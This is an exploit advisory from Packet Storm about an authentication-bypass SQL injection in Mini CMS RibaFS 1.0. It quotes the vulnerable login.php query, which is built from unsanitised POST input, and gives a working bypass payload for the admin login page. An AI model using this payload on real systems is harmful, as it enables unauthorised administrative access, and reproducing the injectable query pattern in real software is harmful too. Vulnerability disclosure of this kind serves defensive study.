Mini CMS RibaFS 1.0 SQL Injection

2010-03-22T00:00:00
ID PACKETSTORM:87523
Type packetstorm
Reporter cr4wl3r
Modified 2010-03-22T00:00:00

Description

                                        
                                            `  
  
  
  
=============================================================  
Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability  
=============================================================  
  
  
[+] Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ###################################### 1  
0 I'm cr4wl3r member from Inj3ct0r Team 1  
1 ###################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[+] Discovered by: cr4wl3r  
[+] My id: http://inj3ct0r.com/author/945  
[+] Original: http://inj3ct0r.com/exploits/9667  
[+] Download : http://code.google.com/p/minicmsribafs/downloads/list  
  
[+] Code [login.php]  
  
if (isset($_POST['login']))  
{  
  
include_once("./../conexao.inc.php");  
  
$login=$_POST['login'];  
$senha=$_POST['senha'];   
  
$senha=md5($senha);  
$sql=" SELECT * FROM usuarios WHERE login ='$login' AND senha = '$senha' ";  
  
$qry= mysql_query($sql);  
  
[+] PoC: [path]/admin/login.php  
Auth Bypass : ' or '1=1  
  
[+] Greetz: All member inj3ct0r.com  
  
  
# Inj3ct0r.com [2010-03-22]  
  
  
`